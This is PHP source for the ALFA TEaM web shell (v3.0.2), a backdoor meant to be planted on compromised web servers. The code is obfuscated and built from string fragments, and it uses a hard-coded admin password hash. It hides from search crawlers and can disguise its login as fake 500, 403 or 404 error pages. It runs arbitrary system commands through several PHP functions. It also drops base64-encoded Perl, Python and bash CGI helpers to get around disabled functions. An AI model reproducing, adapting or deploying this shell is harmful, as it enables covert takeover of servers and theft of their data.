<?php
$GLOBALS['NeUSMyPGXP'] = array(
‘usmfzmlHFCje’ => ‘admin’,//login username
‘paLDRhHfAovu’ => ‘a6f452ec3293d7fb72c5b677257b20ec’,//login password (MD5)… ehsan
‘saEuEgnDlHuL’ => ’1′,//safe mode.. 0 = allow, 1 = deny
‘logXKTfQPNcx’ => ‘gui’,//safe mode type.. gui = login and HTTP errors accepted: 500, 404, 403
‘shiJVQhUrFkw’ => ’1′,//show icons.. 0 = not show, 1 = show
‘pogkUzMiAjqB’ => true,//POST encryption
);

$XDmfxOnhck=’fu’.’nct’.’ion’.’_’.’e’.’x’.’is’.’ts’.”;$RxPWPyQqTL=’cha’.’r’.’Cod’.’e’.’A’.’t’.”;$CyvIHOdCHU=’e’.’va’.’l’.”;$jgpUDiTPrk=’g’.’zi’.’nf’.’l’.’at’.’e’.”;if(!$XDmfxOnhck(‘bas’.’e’.’6′.’4_e’.’ncod’.’e’.”)){function nIWUkxhnhj($data){if(empty($data))return;$b64=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = ”;$tmp_arr = array();if(!$data){return $data;}do{$o1 = $RxPWPyQqTL($data, $i++);$o2 = $RxPWPyQqTL($data, $i++);$o3 = $RxPWPyQqTL($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, ”);$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r – 3)) : $enc).substr(‘===’, ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}}else{function nIWUkxhnhj($s){$b=’bas’.’e’.’6′.’4_e’.’ncod’.’e’.”;return $b($s);}}if(!$XDmfxOnhck(‘b’.’ase’.’6′.’4_deco’.’d’.’e’)){function QFdAWqZnUX($input){if(empty($input))return;$keyStr = “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=”;$chr1 = $chr2 = $chr3 = “”;$enc1 = $enc2 = $enc3 = $enc4 = “”;$i = 0;$output = “”;$input = preg_replace(“[^A-Za-z0-9\+\/\=]“, “”, $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = “”;$enc1 = $enc2 = $enc3 = $enc4 = “”;}while($i < strlen($input));return $output;}}else{function QFdAWqZnUX($s){$b=’b’.’ase’.’6′.’4_deco’.’d’.’e’;return $b($s);}}$gEleJRqGNj=’create_fun’.’ct’.’io’.’n’;$oFcbuslxiL = $gEleJRqGNj(‘$cq’,$CyvIHOdCHU.’(‘.$jgpUDiTPrk.’(‘.’Q’.’FdAW’.’qZ’.’n’.’U’.’X’.”.’($cq)’.’)’.’)’.’;’);

/* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */ /* You’re killing me again Am I still in your head ? You used to light me up Now you shut me down — Solevisible */ @session_start();function __ZW5jb2Rlcg($s){return nIWUkxhnhj($s);}function __ZGVjb2Rlcg($s){return QFdAWqZnUX($s);}$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];$check = false;if(!isset($_SESSION["alfa_settings_signature"])){$check = true;}else{if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){$check = true;}}if($check){$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));foreach($GLOBALS['NeUSMyPGXP'] as $key => $value){$prefix = substr($key, 0, 2);if($prefix == “us”){$GLOBALS['DB_NAME']["user"] = $value;$GLOBALS['DB_NAME']["user_rand"] = $key;}elseif($prefix == “pa”){$GLOBALS['DB_NAME']["pass"] = $value;$GLOBALS['DB_NAME']["pass_rand"] = $key;}elseif($prefix == “sa”){$GLOBALS['DB_NAME']["safemode"] = $value;$GLOBALS['DB_NAME']["safemode_rand"] = $key;}elseif($prefix == “lo”){$GLOBALS['DB_NAME']["login_page"] = $value;$GLOBALS['DB_NAME']["login_page_rand"] = $key;}elseif($prefix == “sh”){$GLOBALS['DB_NAME']["show_icons"] = $value;$GLOBALS['DB_NAME']["show_icons_rand"] = $key;}elseif($prefix == “po”){$GLOBALS['DB_NAME']["post_encryption"] = $value;$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;}}$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];}unset($GLOBALS['NeUSMyPGXP']); if(!isset($_SERVER["HTTP_HOST"]))exit();

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array(“Google”,”Slurp”,”MSNBot”,”ia_archiver”,”Yandex”,”Rambler”,”bot”,”spider”);if(preg_match(‘/’.implode(‘|’,$userAgents).’/i’,$_SERVER['HTTP_USER_AGENT'])){header(‘HTTP/1.0 404 Not Found’);exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit(‘$GLOBALS[\'DB_NAME\'][\'user\']‘);
if(!isset($GLOBALS['DB_NAME']['pass']))exit(‘$GLOBALS[\'DB_NAME\'][\'pass\']‘);
if(!isset($GLOBALS['DB_NAME']['safemode']))exit(‘$GLOBALS[\'DB_NAME\'][\'safemode\']‘);
if(!isset($GLOBALS['DB_NAME']['login_page']))exit(‘$GLOBALS[\'DB_NAME\'][\'login_page\']‘);
if(!isset($GLOBALS['DB_NAME']['show_icons']))exit(‘$GLOBALS[\'DB_NAME\'][\'show_icons\']‘);
if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit(‘$GLOBALS[\'DB_NAME\'][\'post_encryption\']‘);
date_default_timezone_set(‘Asia/Tehran’);
define(“__ALFA_MD5NAME__”, md5($_SERVER["SCRIPT_FILENAME"]));
define(“__ALFA_VERSION__”, “3.0.2″);
define(“__LAST_CWD__”, “last_cwd_”.__ALFA_MD5NAME__);
define(“__PATH_HISTORY__”, “path_history_”.__ALFA_MD5NAME__);
define(“__ALFA_POST_ENCRYPTION__”, (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
$GLOBALS['__ALFA_COLOR__'] = array(
“shell_border” => array(
“key_color” => “#0E304A”,
“multi_selector” => array(
“.header” => “border: 7px solid {color}”,
“#meunlist” => “border-color: {color}”,
“#hidden_sh” => “background-color: {color}”,
“.ajaxarea” => “border: 1px solid {color}”,
“.foot” => “border-color: {color}”,
)
),
“header_vars” => “#27979B”,
“header_values” => “#67ABDF”,
“header_on” => “#00FF00″,
“header_off” => “#ff0000″,
“header_none” => “#00FF00″,
“home_shell” => “#ff0000″,
“home_shell:hover” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.home_shell:hover” => “color: {color};”,
)
),
“back_shell” => “#efbe73″,
“back_shell:hover” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.back_shell:hover” => “color: {color};”,
)
),
“header_pwd” => “#00FF00″,
“header_pwd:hover” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.header_pwd:hover” => “color: {color};”,
)
),
“header_drive” => “#00FF00″,
“header_drive:hover” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.header_drive:hover” => “color: {color};”,
)
),
“header_show_all” => “#00FF00″,
“disable_functions” => “#ff0000″,
“footer_text” => “#27979B”,
“menu_options” => “#27979B”,
“menu_options:hover” => array(
“key_color” => “#646464″,
“multi_selector” => array(
“.menu_options:hover” => “background-color: {color};font-weight: unset;”,
)
),
“options_list” => array(
“key_color” => “#00FF00″,
“multi_selector” => array(
“.ajaxarea .header center a” => “color: {color};”,
)
),
“options_list:hover” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.ajaxarea .header center a:hover” => “color: {color};”,
)
),
“options_list_header” => array(
“key_color” => “#59cc33″,
“multi_selector” => array(
“.txtfont_header” => “color: {color};”,
)
),
“options_list_text” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.txtfont,.tbltxt” => “color: {color};”,
)
),
“Alfa+” => array(
“key_color” => “#27E8AE”,
“multi_selector” => array(
“.alfa_plus” => “color: {color};font-weight: unset;”,
)
),
“hidden_shell_text” => array(
“key_color” => “#00FF00″,
“multi_selector” => array(
“#hidden_sh a” => “color: {color};”,
)
),
“hidden_shell_version” => “#ff0000″,
“shell_name” => “#FF0000″,
“main_row:hover” => array(
“key_color” => “#646464″,
“multi_selector” => array(
“.main tr:hover” => “background-color: {color};”,
)
),
“main_header” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.main th” => “color: {color};”,
)
),
“main_name” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.main .main_name” => “color: {color};font-weight: unset;”,
)
),
“main_size” => “#67ABDF”,
“main_modify” => “#67ABDF”,
“main_owner_group” => “#67ABDF”,
“main_green_perm” => “#25ff00″,
“main_red_perm” => “#FF0000″,
“main_white_perm” => “#FFFFFF”,
“beetween_perms” => “#FFFFFF”,
“main_actions” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.main .actions” => “color: {color};”,
)
),
“menu_options:hover” => array(
“key_color” => “#646464″,
“multi_selector” => array(
“.menu_options:hover” => “background-color: {color};font-weight: unset;”,
)
),
“minimize_editor_background” => array(
“key_color” => “#0e304a”,
“multi_selector” => array(
“.minimized-wrapper” => “background-color: {color};”,
)
),
“minimize_editor_text” => array(
“key_color” => “#f5deb3″,
“multi_selector” => array(
“.minimized-text” => “color: {color};”,
)
),
“editor_border” => array(
“key_color” => “#0e304a”,
“multi_selector” => array(
“.editor-explorer,.editor-modal” => “border: 2px solid {color};”,
)
),
“editor_background” => array(
“key_color” => “rgba(0, 1, 23, 0.94)”,
“multi_selector” => array(
“.editor-explorer,.editor-modal” => “background-color: {color};”,
)
),
“editor_header_background” => array(
“key_color” => “rgba(21, 66, 88, 0.93)”,
“multi_selector” => array(
“.editor-header” => “background-color: {color};”,
)
),
“editor_header_text” => array(
“key_color” => “#00ff7f”,
“multi_selector” => array(
“.editor-path” => “color: {color};”,
)
),
“editor_header_button” => array(
“key_color” => “#1d5673″,
“multi_selector” => array(
“.close-button, .editor-minimize” => “background-color: {color};”,
)
),
“editor_actions” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.editor_actions” => “color: {color};”,
)
),
“editor_file_info_vars” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.editor_file_info_vars” => “color: {color};”,
)
),
“editor_file_info_values” => array(
“key_color” => “#67ABDF”,
“multi_selector” => array(
“.filestools” => “color: {color};”,
)
),
“editor_history_header” => array(
“key_color” => “#14ff07″,
“multi_selector” => array(
“.hheader-text,.history-clear” => “color: {color};”,
)
),
“editor_history_list” => array(
“key_color” => “#03b3a3″,
“multi_selector” => array(
“.editor-file-name” => “color: {color};”,
)
),
“editor_history_selected_file” => array(
“key_color” => “rgba(49, 55, 93, 0.77)”,
“multi_selector” => array(
“.is_active” => “background-color: {color};”,
)
),
“editor_history_file:hover” => array(
“key_color” => “#646464″,
“multi_selector” => array(
“.file-holder > .history:hover” => “background-color: {color};”,
)
),
“input_box_border” => array(
“key_color” => “#0E304A”,
“multi_selector” => array(
“input[type=text],textarea” => “border: 1px solid {color}”,
)
),
“input_box_text” => array(
“key_color” => “#999999″,
“multi_selector” => array(
“input[type=text],textarea” => “color: {color};”,
)
),
“input_box:hover” => array(
“key_color” => “#27979B”,
“multi_selector” => array(
“input[type=text]:hover,textarea:hover” => “box-shadow:0 0 4px {color};border:1px solid {color};”,
)
),
“select_box_border” => array(
“key_color” => “#0E304A”,
“multi_selector” => array(
“select” => “border: 1px solid {color}”,
)
),
“select_box_text” => array(
“key_color” => “#FFFFEE”,
“multi_selector” => array(
“select” => “color: {color};”,
)
),
“select_box:hover” => array(
“key_color” => “#27979B”,
“multi_selector” => array(
“select:hover” => “box-shadow:0 0 4px {color};border:1px solid {color};”,
)
),
“button_border” => array(
“key_color” => “#27979B”,
“multi_selector” => array(
“input[type=submit],.button,#addup” => “border: 1px solid {color};”,
)
),
“button:hover” => array(
“key_color” => “#27979B”,
“multi_selector” => array(
“input[type=submit]:hover” => “box-shadow:0 0 4px {color};border:2px solid {color};”,
“.button:hover,#addup:hover” => “box-shadow:0 0 4px {color};border:1px solid {color};”,
)
),
“outputs_text” => array(
“key_color” => “#67ABDF”,
“multi_selector” => array(
“.ml1″ => “color: {color};”,
)
),
“outputs_border” => array(
“key_color” => “#0E304A”,
“multi_selector” => array(
“.ml1″ => “border: 1px solid {color};”,
)
),
“uploader_border” => array(
“key_color” => “#0E304A”,
“multi_selector” => array(
“.inputfile” => “box-shadow:0 0 4px {color};border:1px solid {color};”,
)
),
“uploader_background” => array(
“key_color” => “#0E304A”,
“multi_selector” => array(
“.inputfile strong” => “background-color: {color};”,
)
),
“uploader_text_right” => array(
“key_color” => “#FFFFFF”,
“multi_selector” => array(
“.inputfile strong” => “color: {color};”,
)
),
“uploader_text_left” => array(
“key_color” => “#25ff00″,
“multi_selector” => array(
“.inputfile span” => “color: {color};”,
)
),
“uploader:hover” => array(
“key_color” => “#27979B”,
“multi_selector” => array(
“.inputfile:hover” => “box-shadow:0 0 4px {color};border:1px solid {color};”,
)
),
“uploader_progress_bar” => array(
“key_color” => “#ff0000″,
“multi_selector” => array(
“#up_bar” => “background-color: {color};”,
)
),
“mysql_tables” => “#00FF00″,
“mysql_table_count” => “#67ABDF”,
“copyright” => “#ff0000″,
“scrollbar” => array(
“key_color” => “#1e82b5″,
“multi_selector” => array(
“*::-webkit-scrollbar-thumb” => “background-color: {color};”,
)
),
“scrollbar_background” => array(
“key_color” => “#000115″,
“multi_selector” => array(
“*::-webkit-scrollbar-track” => “background-color: {color};”,
)
),
);
$GLOBALS['__file_path'] = str_replace(‘\\’,’/’,trim(preg_replace(‘!\(\d+\)\s.*!’, ”, __FILE__)));
$config = array(‘AlfaUser’ => $GLOBALS['DB_NAME']['user'],’AlfaPass’ => $GLOBALS['DB_NAME']['pass'],’AlfaProtectShell’ => $GLOBALS['DB_NAME']['safemode'],’AlfaLoginPage’ => $GLOBALS['DB_NAME']['login_page']);
@session_start();
if($config['AlfaProtectShell']){
$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:””);
$Eform=’<form method=”post”><input style=”margin:0;background-color:#fff;border:1px solid #fff;” type=”password” name=”password”></form>’;
if($config['AlfaLoginPage'] == ‘gui’){
if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
@header(‘location: ‘.$_SERVER["PHP_SELF"]);
}
echo ‘
<style>
body{background: black;}
#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
#loginbox td { border-radius:5px; font-size:11px; }
</style>
<title>~ ALFA TEaM Shell-v’.__ALFA_VERSION__.’ ~</title><center>
<center><img style=”border-radius:100px;” width=”500″ height=”250″ alt=”” src=”http://solevisible.com/images/alfa-iran.png” /></center>
<div id=loginbox><p><font face=”verdana,arial” size=-1>
<center><table cellpadding=\’2\’ cellspacing=\’0\’ border=\’0\’ id=\’ap_table\’>
<tr><td bgcolor=”green”><table cellpadding=\’0\’ cellspacing=\’0\’ border=\’0\’ width=\’100%\’><tr><td bgcolor=”green” align=center style=”padding:2;padding-bottom:4″><b><font color=”white” size=-1 color=”white” face=”verdana,arial”><b>~ ALFA TEaM Shell-v’.__ALFA_VERSION__.’ ~</b></font></th></tr>
<tr><td bgcolor=”black” style=”padding:5″>
<form method=”post”>
<input type=”hidden” name=”action” value=”login”>
<input type=”hidden” name=”hide” value=””>
<center><table>
<tr><td><font color=”green” face=”verdana,arial” size=-1>Login:</font></td><td><input type=”text” size=”30″ name=”usrname” placeholder=”username” onfocus=”if (this.value == \’username\’){this.value = \’\’;}”></td></tr>
<tr><td><font color=”green” face=”verdana,arial” size=-1>Password:</font></td><td><input type=”password” size=”30″ name=”password” placeholder=”password” onfocus=”if (this.value == \’password\’) this.value = \’\’;”></td></tr>
<tr><td><font face=”verdana,arial” size=-1>&nbsp;</font></td><td><font face=”verdana,arial” size=-1><input type=”submit” value=”Login”></font></td></tr></table>
</div><br /></center>’;
exit;
}
}elseif($config['AlfaLoginPage']==’500′){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header(‘location: ‘.$_SERVER["PHP_SELF"]);
}
echo ‘<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ‘.$_SERVER['SERVER_ADMIN'].’ and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>’.$SERVER_SIG.’</body></html>’.$Eform;
exit;
}
}elseif($config['AlfaLoginPage']==’403′){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header(‘location: ‘.$_SERVER["PHP_SELF"]);
}
echo “<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don’t have permission to access “.$_SERVER['PHP_SELF'].” on this server.</p><hr>”.$SERVER_SIG.”</body></html>”.$Eform;
exit;
}
}elseif($config['AlfaLoginPage']==’404′){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header(‘location: ‘.$_SERVER["PHP_SELF"]);
}
echo “<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL “.$_SERVER['PHP_SELF'].” was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>”.$SERVER_SIG.”</body></html>”.$Eform;
exit;
}
}
}
function decrypt_post($str, $pwd){
if(__ALFA_POST_ENCRYPTION__){
$pwd     = __ZW5jb2Rlcg($pwd);
$str     = __ZGVjb2Rlcg($str);
$enc_chr = “”;
$enc_str = “”;
$i       = 0;
while ($i < strlen($str)) {
for ($j = 0; $j < strlen($pwd); $j++) {
$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
$enc_str .= $enc_chr;
$i++;
if ($i >= strlen($str))
break;
}
}
return __ZGVjb2Rlcg($enc_str);
}else{
return __ZGVjb2Rlcg($str);
}
}

function _AlfaSecretKey(){
if(!isset($_SESSION["AlfaSecretKey"])){
$_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
}
return $_SESSION["AlfaSecretKey"];
}
function alfa_getColor($target){
if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=””){
return $GLOBALS["DB_NAME"]["color"][$target];
}else{
$target = $GLOBALS["__ALFA_COLOR__"][$target];
if(is_array($target)){
return $target["key_color"];
}else{
return $target;
}
}
}
function alfaCssLoadColors(){
$css = “”;
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
if(!is_array($value)){
$value = alfa_getColor($key);
$css .= “.{$key}{color: {$value};}”;
}else{
if(isset($value["multi_selector"])){
foreach($value["multi_selector"] as $k => $v){
$color = alfa_getColor($key);
$code = str_replace(“{color}”, $color, $v);
$css .=  $k.”{“.$code.”}”;
}
}
}
}
return $css;
}
if(isset($_POST['ajax'])){
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo ‘<script>’;
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo ‘alfa’.$alfa.”_=”;
}
echo ‘””</script>’;
}}
function _alfa_cgicmd($cmd,$lang=”perl”){
if(isset($_SESSION["alfacgiapi_mode"])){
return “”;
}
$cmd_pure = $cmd;
$is_curl = function_exists(‘curl_version’);
$is_socket = function_exists(‘fsockopen’);
if($is_curl||$is_socket){
$recreate = false;
if(isset($_SESSION["alfacgiapi"])){
if(!@file_exists(“alfacgiapi/”.$_SESSION["alfacgiapi"].”.alfa”)){
$recreate = true;
$lang = $_SESSION["alfacgiapi"];
}
}
if(!isset($_SESSION["alfacgiapi"])||$recreate){
@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
$perl = ‘jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=’;
$py = “bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=”;
$bash = “rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C”;
if($lang==”perl”)$source = $perl;elseif($lang==”py”)$source = $py;else $source = $bash;
alfaWriteTocgiapi($lang.”.alfa”,$source);
alfacgihtaccess(‘cgi’, “alfacgiapi/”);
}else{
$lang = $_SESSION["alfacgiapi"];
}
$cmd = “check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=”.__ZW5jb2Rlcg(“cd “.$GLOBALS['cwd'].”;”.$cmd);
if($is_curl){
$address = ($_SERVER['SERVER_PORT'] == 443 ? “https://” : “http://”).$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"]).”/alfacgiapi/”.$lang.”.alfa”;
$post = new AlfaCURL();
$data = $post->Send($address, “post”, $cmd);
}elseif($is_socket){
$server = $_SERVER["SERVER_NAME"];
$uri = dirname($_SERVER["REQUEST_URI"]).”/alfacgiapi/”.$lang.”.alfa”;
$data = _alfa_fsockopen($server,$uri,$cmd);
}
$out = “”;
if(strstr($data, “[solevisible~api]“)){
$_SESSION["alfacgiapi"] = $lang;
if(@preg_match(“/<pre>(.*?)<\/pre>/s”, $data, $res)){
$out = $res[1];
}
}elseif($lang==”perl”){
return _alfa_cgicmd($cmd_pure,”py”);
}elseif($lang==”py”){
return _alfa_cgicmd($cmd_pure,”bash”);
}else{
$_SESSION["alfacgiapi_mode"] = “off”;
}
return trim($out);
}else{
return “”;
}
}
function alfaEx($in,$re=false,$cgi=true,$all=false){
$data = _alfa_php_cmd($in,$re);
if(empty($data)&&$cgi||$all){
if($GLOBALS['sys']==’unix’){
if(strlen(_alfa_php_cmd(“whoami”))==0||$all){
$cmd = _alfa_cgicmd($in);
if(!empty($cmd)){
return $cmd;
}
}
}
}
return $data;
}
function _alfa_php_cmd($in,$re=false){
$out=”;
try{
if($re)$in=$in.” 2>&1″;
if(function_exists(‘exec’)){
@exec($in,$out);
$out = @join(“\n”,$out);
}elseif(function_exists(‘passthru’)) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists(‘system’)){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists(‘shell_exec’)) {
$out = shell_exec($in);
}elseif(function_exists(“popen”)&&function_exists(“pclose”)){
if(is_resource($f = @popen($in,”r”))){
$out = “”;
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists(‘proc_open’)){
$pipes = array();
$process = @proc_open($in.’ 2>&1′, array(array(“pipe”,”w”), array(“pipe”,”w”), array(“pipe”,”w”)), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists(‘COM’)){
$alfaWs = new COM(‘WScript.shell’);
$exec = $alfaWs->exec(‘cmd.exe /c ‘.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function _alfa_fsockopen($server,$uri,$post){
$socket = @fsockopen($server, 80, $errno, $errstr, 15);
if($socket){
$http  = “POST {$uri} HTTP/1.0\r\n”;
$http .= “Host: {$server}\r\n”;
$http .= “User-Agent: ” . $_SERVER['HTTP_USER_AGENT'] . “\r\n”;
$http .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$http .= “Content-length: ” . strlen($post) . “\r\n”;
$http .= “Connection: close\r\n\r\n”;
$http .= $post . “\r\n\r\n”;
fwrite($socket, $http);
$contents = “”;
while (!@feof($socket)) {
$contents .= @fgets($socket, 4096);
}
list($header, $body) = explode(“\r\n\r\n”, $contents, 2);
@fclose($socket);
return $body;
}else{
return “”;
}
}
if(isset($_GET["solevisible"])){
@error_reporting(E_ALL ^ E_NOTICE);
echo ‘<html>’;
echo “<title>Solevisible Hidden Shell</title>”;
echo “<body bgcolor=#000000>”;
echo ‘<b><big><font color=#7CFC00>Kernel : </font><font color=”#FFFFF”>’.(function_exists(‘php_uname’)?php_uname():’???’).’</font></b></big>’;
$safe_mode = @ini_get(‘safe_mode’);
if($safe_mode){$r = “<b style=’color: red’>On</b>”;}else{$r = “<b style=’color: green’>Off</b>”;}
echo “<br><b style=’color: #7CFC00′>OS: </font><font color=white>” . PHP_OS . “</font><br>”;
echo “<b style=’color: #7CFC00′>Software: </font><font color=white>” . $_SERVER ['SERVER_SOFTWARE'] . “</font><br>”;
echo “PHP Version: <font color=white>” . PHP_VERSION .  “</font><br />”;
echo “PWD:<font color=#FFFFFF> ” . str_replace(“\\”,”/”,@getcwd()) . “/<br />”;
echo “<b style=’color: #7CFC00′>Safe Mode : $r<br>”;
echo”<font color=#7CFC00>Disable functions : </font>”;
$disfun = @ini_get(‘disable_functions’);
if(empty($disfun)){$disfun = ‘<font color=”green”>NONE</font>’;}
echo”<font color=red>”;
echo “$disfun”;
echo”</font><br>”;
echo “<b style=’color: #7CFC00′>Your Ip Address is :  </font><font color=white>” . $_SERVER['REMOTE_ADDR'] . “</font><br>”;
